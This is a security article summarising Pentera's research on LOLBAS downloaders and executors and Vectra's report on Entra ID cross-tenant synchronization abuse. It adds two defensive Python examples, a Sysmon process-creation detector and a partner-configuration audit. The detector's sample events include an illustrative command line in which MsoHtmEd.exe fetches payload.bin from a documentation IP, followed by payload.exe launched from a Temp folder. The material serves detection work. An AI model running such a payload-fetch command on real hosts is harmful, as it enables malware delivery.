Cybersecurity researchers have identified a set of 11 living-off-the-land binaries and scripts (LOLBAS) that attackers could abuse to carry out post-exploitation actions. LOLBAS refers to the technique of turning system binaries and scripts that are already present on a host to malicious ends, which makes it hard for security teams to distinguish legitimate activity from malicious activity. Israeli cybersecurity firm Pentera discovered nine LOLBAS downloaders and three executors that could let adversaries fetch and run more advanced malware on infected hosts. They include files such as MsoHtmEd.exe, Mspub.exe, and InstallUtil.exe. Attackers can use the LOLBAS downloaders to retrieve more capable malware and then launch it stealthily with the LOLBAS executors, so that the activity appears as part of a legitimate process tree on the system. Pentera also noted that attackers could use executables from non-Microsoft software to achieve similar goals.
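Because these binaries are legitimate, blocking them outright is rarely an option; the practical defence is telemetry-based detection. The following is an added example (not code from the article or from Pentera) that runs two heuristics over Sysmon-style process-creation records: a watched binary invoked with a URL on its command line (download), and a watched binary spawning a child from a user-writable directory (execution of a dropped payload). The sample events, the URL and path heuristics, and the argument shapes on the command lines are constructed for this example and are not the binaries' documented syntax.

```python
import re

# Binaries named in the article as LOLBAS downloaders/executors (lower-cased basenames).
WATCHED = {"msohtmed.exe", "mspub.exe", "installutil.exe"}

# Heuristics are assumptions for this example: a URL on the command line
# suggests a download; a child image under a user-writable path suggests
# execution of a dropped payload.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public|users\\[^\\]+)\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, pid, detail) alerts for a list of Sysmon-like process-creation records."""
    alerts = []
    by_pid = {e["ProcessId"]: e for e in events}
    for e in events:
        name = basename(e["Image"])
        # Rule 1: a watched binary given a URL argument -> likely LOLBAS download.
        if name in WATCHED:
            m = URL_RE.search(e["CommandLine"])
            if m:
                alerts.append(("lolbas_download", e["ProcessId"], f"{name} fetched {m.group(0)}"))
        # Rule 2: a watched binary as parent of a process launched from a
        # user-writable location -> likely LOLBAS execution of a dropped file.
        parent = by_pid.get(e["ParentProcessId"])
        if parent and basename(parent["Image"]) in WATCHED and USER_WRITABLE.search(e["Image"]):
            alerts.append(("lolbas_execute", e["ProcessId"],
                           f"{basename(parent['Image'])} spawned {e['Image']}"))
    return alerts


# Constructed sample events (not real telemetry); fields mirror Sysmon Event ID 1.
# The URL argument to MsoHtmEd.exe is illustrative, not the tool's documented syntax.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\MsoHtmEd.exe",
     "CommandLine": "MsoHtmEd.exe http://203.0.113.5/payload.bin"},
    {"ProcessId": 300, "ParentProcessId": 100,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE",
     "CommandLine": "MSPUB.EXE"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Users\alice\AppData\Local\Temp\payload.exe", "CommandLine": "payload.exe"},
    # Benign developer use of InstallUtil against a build directory: should not alert.
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe C:\Build\Service.exe"},
]

if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid}: {detail}")
```

The parent/child correlation is what distinguishes this from a plain image-name match: Office and .NET tooling runs legitimately all day, so the last sample event (InstallUtil.exe on a build path) stays silent, while MSPUB.EXE spawning a binary out of %TEMP% does not. Expect to tune the path list per environment.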
Separately, Vectra recently disclosed a potential attack vector that abuses the Microsoft Entra ID cross-tenant synchronization (CTS) feature to facilitate lateral movement between connected tenants. An attacker who has already compromised a privileged identity in a cloud environment can use an existing CTS configuration to move laterally from one tenant to another. Alternatively, an attacker inside a compromised tenant can deploy a rogue cross-tenant access configuration to maintain persistent access. Organizations should be aware of these abuse paths and take appropriate measures to protect their systems and data.
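Both paths leave a trace in the tenant's cross-tenant access policy, so a periodic audit of partner configurations is the natural control. The following is an added example (not code from the article or from Vectra) that audits a partner list against a set of approved tenant IDs and flags partners that allow inbound user synchronization, with or without automatic inbound consent. The sample data is constructed and its field names are an assumption modelled on the shape of Microsoft Graph's cross-tenant access policy partner objects; verify them against the live API before depending on them. The approved-tenant list and all tenant IDs are made up.

```python
import json

# Constructed sample (not real data), shaped like a simplified Graph response for the
# cross-tenant access policy partner list. The field names and nesting are an
# assumption for this example and must be checked against the real API.
SAMPLE_PARTNERS = json.loads("""
{
  "value": [
    {
      "tenantId": "11111111-1111-1111-1111-111111111111",
      "automaticUserConsentSettings": {"inboundAllowed": true, "outboundAllowed": false},
      "identitySynchronization": {"userSyncInbound": {"isSyncAllowed": true}}
    },
    {
      "tenantId": "22222222-2222-2222-2222-222222222222",
      "automaticUserConsentSettings": {"inboundAllowed": false, "outboundAllowed": false},
      "identitySynchronization": {"userSyncInbound": {"isSyncAllowed": false}}
    },
    {
      "tenantId": "33333333-3333-3333-3333-333333333333",
      "automaticUserConsentSettings": {"inboundAllowed": true, "outboundAllowed": true},
      "identitySynchronization": {"userSyncInbound": {"isSyncAllowed": true}}
    }
  ]
}
""")

# Assumed allow-list of partner tenants the organization knowingly federates with;
# in practice this comes from your own change records, not from the tenant itself.
APPROVED_TENANTS = {
    "11111111-1111-1111-1111-111111111111",
    "22222222-2222-2222-2222-222222222222",
}


def audit_partners(partners, approved):
    """Return (finding, tenantId) pairs for risky cross-tenant partner configurations.

    unapproved_partner       : partner tenant not on the allow-list (possible rogue config)
    inbound_sync_no_consent  : inbound user sync allowed AND inbound auto-consent on,
                               so synced users need no per-user consent prompt
    inbound_sync_enabled     : inbound user sync allowed (review even if approved)
    """
    findings = []
    for p in partners.get("value", []):
        tid = p.get("tenantId", "<missing>")
        consent = p.get("automaticUserConsentSettings") or {}
        sync = (p.get("identitySynchronization") or {}).get("userSyncInbound") or {}
        inbound_sync = bool(sync.get("isSyncAllowed"))
        auto_consent = bool(consent.get("inboundAllowed"))
        if tid not in approved:
            findings.append(("unapproved_partner", tid))
        if inbound_sync and auto_consent:
            findings.append(("inbound_sync_no_consent", tid))
        elif inbound_sync:
            findings.append(("inbound_sync_enabled", tid))
    return findings


if __name__ == "__main__":
    for finding, tid in audit_partners(SAMPLE_PARTNERS, APPROVED_TENANTS):
        print(f"{finding}: {tid}")
```

An unapproved partner that also has inbound sync and automatic consent enabled is the configuration an attacker would add for persistence; an approved partner with the same settings is the configuration an attacker who already holds a privileged identity in that partner could ride for lateral movement, which is why the audit reports both rather than only the unknown tenant.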